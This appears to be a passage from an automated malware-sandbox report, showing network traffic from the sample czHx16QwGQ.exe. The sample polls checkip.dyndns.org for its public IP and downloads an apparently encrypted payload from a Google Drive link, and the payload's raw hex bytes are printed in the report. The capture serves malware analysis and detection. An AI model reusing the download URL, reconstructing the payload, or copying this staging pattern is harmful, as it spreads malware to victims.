                                                                                                              Jan 10, 2025 23:39:21.011235952 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:20 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.849977193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:21.963926077 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:22.602320910 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:22 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.849989193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:23.472474098 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:24.118220091 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:24 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.850002193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:25.045470953 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:25.674902916 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:25 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.850009193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:26.631323099 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:27.263161898 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:27 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.2.850011193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:28.124905109 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:28.780191898 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:28 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              18192.168.2.850013193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:29.664916039 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:30.321669102 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:30 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              19192.168.2.850015193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:31.162221909 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:31.818458080 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:31 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              20192.168.2.850017193.122.6.168805296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 10, 2025 23:39:32.731367111 CET151OUTGET / HTTP/1.1
                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                              Host: checkip.dyndns.org
                                                                                                              Connection: Keep-Alive
                                                                                                              Jan 10, 2025 23:39:33.374069929 CET273INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 10 Jan 2025 22:39:33 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 104
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.849735216.58.206.464435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:38:47 UTC216OUTGET /uc?export=download&id=1ldZgiMZVF2Jm6I1zMoLRFfBr1vhf_sHj HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                              Host: drive.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-10 22:38:48 UTC1920INHTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Fri, 10 Jan 2025 22:38:48 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=1ldZgiMZVF2Jm6I1zMoLRFfBr1vhf_sHj&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'nonce-xDazmH4HtM2z2jUnZ2UTmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.849741142.250.181.2254435296C:\Users\user\Desktop\czHx16QwGQ.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-10 22:38:48 UTC258OUTGET /download?id=1ldZgiMZVF2Jm6I1zMoLRFfBr1vhf_sHj&export=download HTTP/1.1
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              2025-01-10 22:38:52 UTC4939INHTTP/1.1 200 OK
                                                                                                              X-GUploader-UploadID: AFiumC7WnDDwbDws2umAz35vIU58JcDaZ4S068ha-pEF18y5y7Ox4oIrL0DHPsRKbYgbihBkixzXJ0Y
                                                                                                              Content-Type: application/octet-stream
                                                                                                              Content-Security-Policy: sandbox
                                                                                                              Content-Security-Policy: default-src 'none'
                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Cross-Origin-Embedder-Policy: require-corp
                                                                                                              Cross-Origin-Resource-Policy: same-site
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Content-Disposition: attachment; filename="DULnmuMNsF48.bin"
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Access-Control-Allow-Credentials: false
                                                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                              Accept-Ranges: bytes
                                                                                                              Content-Length: 94272
                                                                                                              Last-Modified: Sun, 08 Dec 2024 21:14:15 GMT
                                                                                                              Date: Fri, 10 Jan 2025 22:38:52 GMT
                                                                                                              Expires: Fri, 10 Jan 2025 22:38:52 GMT
                                                                                                              Cache-Control: private, max-age=0
                                                                                                              X-Goog-Hash: crc32c=11wqpA==
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close
                                                                                                              2025-01-10 22:38:52 UTC4939INData Raw: 34 5f 96 bc 41 80 20 30 32 7f c9 8a 1a fc 98 53 dc ab 0f 27 43 a3 b4 7a 0d 4b eb 7e 1d 2d ae 6c 31 81 80 70 25 15 0b fa b5 16 65 c1 ce 98 29 ed 38 00 8f 80 f0 db 3d 73 dd 4b e1 19 a3 fa 4a 2b b9 2f 91 5d 5c 02 b4 2e 85 df af ef 26 40 41 df df fd 52 43 29 4a ce 7d 88 e5 e4 60 80 b6 27 27 6f 4e 2d 7a 46 4b cd 0e 50 5d 38 f3 77 ae 71 c5 51 43 4c 20 df 43 37 78 25 ae b3 8e 54 07 75 88 23 e5 8a d5 a2 96 30 e0 1e 66 2f e4 40 8e 0b 81 80 79 31 56 86 cd c3 ae f2 6d 54 a9 c7 9e 8d 04 c4 52 72 da 3a 3b b1 2f 57 85 fc c5 1f e7 ae e2 06 6c 6b 21 e6 02 c0 40 62 4b 50 9b 91 c5 cd 4a 6e e9 f3 c7 43 22 59 32 df e5 db 51 e6 26 1b c9 9d 89 e1 67 fb 96 4c b1 39 fd c7 a9 2c 4f 5c 40 eb ff 53 08 c6 d8 9a b0 9d 45 d5 1a af b3 e0 51 9d 44 f6 20 93 64 a9 3f 0e ed a9 67 78 3d 99
                                                                                                              Data Ascii: 4_A 02S'CzK~-l1p%e)8=sKJ+/]\.&@ARC)J}`''oN-zFKP]8wqQCL C7x%Tu#0f/@y1VmTRr:;/Wlk!@bKPJnC"Y2Q&gL9,O\@SEQD d?gx=
                                                                                                              2025-01-10 22:38:52 UTC4821INData Raw: a0 f1 7d e4 e0 cb c3 54 14 a0 f3 8b 6b 00 63 36 1c 80 37 c9 87 7c d1 6b 39 88 d2 75 e1 67 32 bc a1 fd f8 4e a0 2c 69 30 c6 0a 27 9a 46 e7 96 c1 a6 d5 fa 83 4a 52 c7 2e 08 fc d1 e5 9d 03 2d 71 43 05 ed 0c 9b 9b b8 ba 23 81 f9 5f ce 4d f4 a9 1b b3 a7 66 75 f6 2b 3b d9 76 58 a6 ff 7c d0 8e 88 5e 17 c3 11 4f 17 5a 65 be 80 d3 71 96 2f 6a 8f 45 2b c3 1e 4f ad 53 e6 cf 6a 30 65 38 94 0b b2 3b 3f f9 c4 8f b8 b7 4b 9f 11 67 40 27 7b 7b e9 c6 f5 71 2d 46 9e b1 78 a9 bb fc 43 0a 9c 5a fd fd 60 ec 14 fc b1 b7 2f a3 90 48 9f 1c a7 30 70 2e 2d f0 e2 e4 2b 7b b2 33 4a 0a 49 bd a7 3b 0d f9 91 48 74 fd c1 58 bd 55 67 95 bd 1c fa 93 e1 90 70 d4 29 75 cf 61 7f 68 87 77 2c e5 17 81 f8 72 82 c6 3b 90 3e 8f b8 a0 52 8b d3 99 d9 14 14 26 76 0f 4f bd 78 cd 20 6c ed 42 26 25 6d
                                                                                                              Data Ascii: }Tkc67|k9ug2N,i0'FJR.-qC#_Mfu+;vX|^OZeq/jE+OSj0e8;?Kg@'{{q-FxCZ`/H0p.-+{3JI;HtXUgp)uahw,r;>R&vOx lB&%m
                                                                                                              2025-01-10 22:38:52 UTC1322INData Raw: a1 ab 2e 91 53 7b 36 95 8b 0c b9 1d 23 68 fd 73 12 87 0b c9 4f 0e d6 75 ac d5 21 a7 e0 6d 8f fa 94 a5 1c 24 ac d4 20 49 2d 6d 5e 6b cd e5 f2 9d 5c 4a 2f 3a 37 04 2b ad d5 1f e1 93 fb 70 a0 37 23 8f 5f 0f 48 6a ac 64 44 de 91 b5 aa 50 07 c5 84 e5 f7 80 6c b0 3d d2 9a b0 2c b7 58 b6 fa 39 00 61 66 2f 30 66 ad cf 37 ee 93 09 e7 64 f5 5b 5d 0e 2c a8 f9 2a a4 4e 2b b8 d1 96 26 bc 6d 3c 37 a0 9b 04 bc 50 63 cd e1 61 ec 96 ca 4b fa 1e ff e2 48 69 4a b2 5d 98 0f 0d 93 ef 5a f9 c8 8f b5 b4 21 55 42 85 cf 80 3b a0 75 01 57 53 0a a7 28 90 d9 83 e2 db c4 09 df 67 f9 7a 90 29 4a c4 7d c8 e5 e6 1b cc b6 27 23 11 1d 2d 7a 4c 63 99 0e 50 57 35 fa 64 a9 60 c2 7d 4e 4e 5b 93 43 37 7c 0d 7d b3 8e de 07 75 88 07 fa 30 c0 92 28 39 07 3e de 2e 8d 8d af 4e e9 eb 74 2c 26 f4 a6
                                                                                                              Data Ascii: .S{6#hsOu!m$ I-m^k\J/:7+p7#_HjdDPl=,X9af/0f7d[],*N+&m<7PcaKHiJ]Z!UB;uWS(gz)J}'#-zLcPW5d`}NN[C7|}u0(9>.Nt,&
                                                                                                              2025-01-10 22:38:52 UTC1390INData Raw: fb 0c 4d a9 ad 96 9c a0 a0 ac 5e 9e d3 ed 08 a6 0d 2f 13 d8 47 c3 65 6f 05 72 ed 98 38 25 6d 39 10 1a 07 ef f1 aa 15 38 88 c7 fe b2 62 b0 67 17 24 60 e9 b4 8a 72 1b ac d9 37 8e 2d 58 66 0d a7 5f 43 a0 45 2a 53 45 aa 46 81 01 4f 1d 88 f2 da c8 67 d9 69 6a ff 19 6f 4d 45 75 2f 3b 25 36 82 f1 df 22 1b 60 fc 88 9d 36 ae 34 30 0b df c3 2e 55 e4 59 16 10 22 75 dc ea 25 aa 3d d9 dd 8f d3 64 f0 ac 9f 97 fd 7e 85 82 d6 fa 1f fe 76 66 44 6b 43 a5 4a bd e1 fc 83 b8 85 8b 1c 54 9a f3 2d 02 19 d7 6d 68 4b 36 a2 2f 83 04 c6 b2 ce c4 87 d2 a5 fa 54 85 ca cc c2 0e 25 39 86 c8 1c 50 14 75 cd 13 4d 90 62 b9 28 36 ad 29 c0 b1 a6 87 f7 4a 41 e5 db e3 86 3c 06 69 0b a0 d8 39 e7 66 3d 1c f8 cf 7c 83 8b 40 03 90 ee 0a 8c 82 0c 7b d2 ba d4 bd 35 af 29 e1 d5 fa fc ca 6d 10 af f5
                                                                                                              Data Ascii: M^/Geor8%m98bg$`r7-Xf_CE*SEFOgijoMEu/;%6"`640.UY"u%=d~vfDkCJT-mhK6/T%9PuMb(6)JA<i9f=|@{5)m
                                                                                                              2025-01-10 22:38:52 UTC1390INData Raw: 1e db b7 51 bd 30 7a a9 25 d7 96 2c 8d aa e8 a6 5a ff d4 29 1c 38 4d 0f e3 94 bc 11 45 67 2f 92 0a 2d 7d 13 94 76 f5 99 e4 03 6e 64 42 63 e7 ff a1 40 3c a5 d0 b0 f8 7e 14 35 da 16 ed 60 8b 1b 79 35 74 1b 22 f5 2a 4e 6c 39 26 d2 41 c0 09 9a b9 2a 80 0d d7 2b cc e1 30 42 b1 90 7e 9c f0 0c b6 69 a5 31 4e e3 93 72 eb 6f 83 f6 98 d3 18 3c 54 f6 c3 54 ec 58 cd b9 25 71 4a d2 c8 aa 06 44 f1 78 e1 7d 7c e2 eb 35 ea 2c 77 dd 11 3b 3e 20 31 4a a6 06 94 e0 fb 6d b6 b3 41 1b 59 96 87 05 f0 17 22 f6 22 3c f5 14 23 74 38 c5 95 71 7f 64 36 3a c5 25 b4 55 e6 79 91 74 a1 65 ac 07 09 e1 82 50 8c 10 11 e3 4d 17 c1 8e 60 24 c8 e0 f3 d4 45 7a 28 c9 59 04 47 d5 33 ce aa 48 09 58 26 d1 79 7d ef 9f 73 15 ca 5b 0d 5a 4f 21 d7 9a 06 e3 a5 91 34 90 6a f7 da 51 0f fe 9d c2 78 e8 08
                                                                                                              Data Ascii: Q0z%,Z)8MEg/-}vndBc@<~5`y5t"*Nl9&A*+0B~i1Nro<TTX%qJDx}|5,w;> 1JmAY""<#t8qd6:%UytePM`$Ez(YG3HX&y}s[ZO!4jQx
                                                                                                              2025-01-10 22:38:52 UTC1390INData Raw: 5e ec b9 ec b0 b4 33 21 3a 85 c9 a0 13 f4 6e 31 5b 5f 10 b5 2e 81 ee af ef c8 bf 43 ad af e6 52 33 01 04 ce 7d c2 ee f2 ed d9 b6 27 26 63 49 05 82 46 4b c7 18 ae 5c 35 fa 64 ab 60 c0 7d 4a 58 33 db 43 0f a5 25 ae b3 8e a6 e5 6e 88 5d e4 43 22 a2 22 33 2a 17 24 2e a8 87 87 a4 e9 e9 00 02 20 e5 a4 cb 20 93 00 7e d9 ae db a0 7a b8 1d 6e bf 1a 43 ec 7b 77 ec 98 f6 52 b9 f4 b6 f6 03 0f 45 db 05 dc 40 29 b6 50 9b 9b d6 c6 5b 35 bf ff d6 03 0f 43 23 62 b0 50 e0 e6 2c 0c a6 62 89 e1 6d 74 96 4f b0 38 d4 fd a9 2c 23 51 40 eb f7 42 00 a9 58 9a b0 49 d3 d9 0b a2 be 50 8f 8a f5 ff 55 82 64 e9 3e 22 c0 b8 6f 0d 2e 99 c6 26 cc 3b ab 9b d5 8e e3 5d ef 3a 66 b1 13 09 98 72 2f 69 ee a7 45 8c 5b b2 20 77 48 03 11 4b 7b 20 40 5c 16 59 2d f6 18 e0 e0 22 b9 10 e7 bd 0d 4c 91
                                                                                                              Data Ascii: ^3!:n1[_.CR3}'&cIFK\5d`}JX3C%n]C""3*$. ~znC{wRE@)P[5C#bP,bmtO8,#Q@BXIPUd>"o.&;]:fr/iE[ wHK{ @\Y-"L
                                                                                                              2025-01-10 22:38:52 UTC1390INData Raw: 87 f8 cf 77 3a 9e 5c 7d 32 ef 0a 86 c3 e8 6c c3 ca a4 7e 1d 77 23 43 fa 91 a2 09 6d 60 8d c9 69 a9 9e 91 54 93 f0 98 ea 02 fe f8 f4 2d 97 52 78 67 ad 87 e5 90 5b 17 4b 2f 1a ca 47 cb 44 94 ed 70 67 0a 8e f8 ff da 2e fc c9 6d d1 71 7a ed 55 f0 10 39 8e 1b dc 62 29 d9 16 a2 ae 61 e1 19 0c 94 7c cb 70 0a 3d 2b 02 4a de 26 42 b0 60 f7 a2 fa ba ca 31 9c 41 59 05 21 9f 8f 8e 51 65 b8 24 17 9d b5 15 5a fc 36 6c 04 fc 20 75 00 2d e5 31 3c 85 f6 e6 20 32 5c 37 1f 6c cc 58 79 f6 5a 0e 37 fc 8f 2e 6f 24 87 6d db d2 a4 17 6a 5a 8d 00 6b 11 f9 bf 47 e4 3a 92 8a 05 63 c7 f1 90 2a fb 87 97 f1 10 9d 08 b5 c0 d8 e1 d4 05 48 59 37 e9 ce 29 c6 22 e4 bf 9b d3 22 fd 0e 52 a7 b3 25 78 93 a8 79 b5 02 21 d6 49 03 51 6b 05 61 65 61 8f 03 04 15 44 c8 5e 40 26 77 58 3a 0c 10 b9 b8
                                                                                                              Data Ascii: w:\}2l~w#Cm`iT-Rxg[K/GDpg.mqzU9b)a|p=+J&B`1AY!Qe$Z6l u-1< 2\7lXyZ7.o$mjZkG:c*HY7)""R%xy!IQkaeaD^@&wX:
